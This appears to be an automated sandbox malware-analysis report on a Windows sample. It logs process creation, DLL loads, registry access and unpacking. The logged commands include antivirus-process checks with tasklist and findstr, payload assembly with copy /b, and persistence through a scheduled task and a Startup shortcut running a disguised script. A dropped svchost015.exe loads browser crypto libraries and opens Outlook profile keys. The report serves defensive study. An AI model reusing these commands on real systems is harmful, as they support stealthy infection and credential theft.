Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Teach Teach.bat & Teach.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 795933	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "tagsnegotiationthreadadobe" Literature	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Church + ..\Activity + ..\Yahoo + ..\Census + ..\Mario + ..\Postcards + ..\Vessel + ..\Vhs + ..\Maps + ..\Convenience + ..\Comment + ..\Shift z	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\795933\Burn.pif Burn.pif z	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & echo URL="C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Process created: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w"
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w"

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Section loaded: ncryptsslp.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: h8jGj6Qe78.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: svchost015.exe, 0000001D.00000002.2675141656.000000006C8AD000.00000002.00000001.01000000.0000000F.sdmp, mozglue[1].dll.29.dr, mozglue.dll.29.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.29.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.29.dr
Source:	Binary string: nss3.pdb@ source: svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 0000001F.00000000.3039162333.0000000000272000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe.17.dr
Source:	Binary string: softokn3.pdb@ source: softokn3.dll.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.29.dr, msvcp140[1].dll.29.dr
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001F.00000000.3039162333.0000000000272000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe.17.dr
Source:	Binary string: nss3.pdb source: svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr
Source:	Binary string: mozglue.pdb source: svchost015.exe, 0000001D.00000002.2675141656.000000006C8AD000.00000002.00000001.01000000.0000000F.sdmp, mozglue[1].dll.29.dr, mozglue.dll.29.dr
Source:	Binary string: softokn3.pdb source: softokn3.dll.29.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Unpacked PE file: 0.2.h8jGj6Qe78.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ewggbbh	Unpacked PE file: 3.2.ewggbbh.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Local\Temp\329C.exe

Code function: 7_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

7_2_00406312

Source: 329C.exe.1.dr

Static PE information: real checksum: 0x1c6b06 should be: 0x1c22fb

Source: freebl3.dll.29.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.29.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.29.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.29.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.29.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.29.dr	Static PE information: section name: .didat
Source: nss3.dll.29.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.29.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.29.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.29.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00403245 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00403265 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401C0A pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0040321E push eax; ret	0_2_00403276
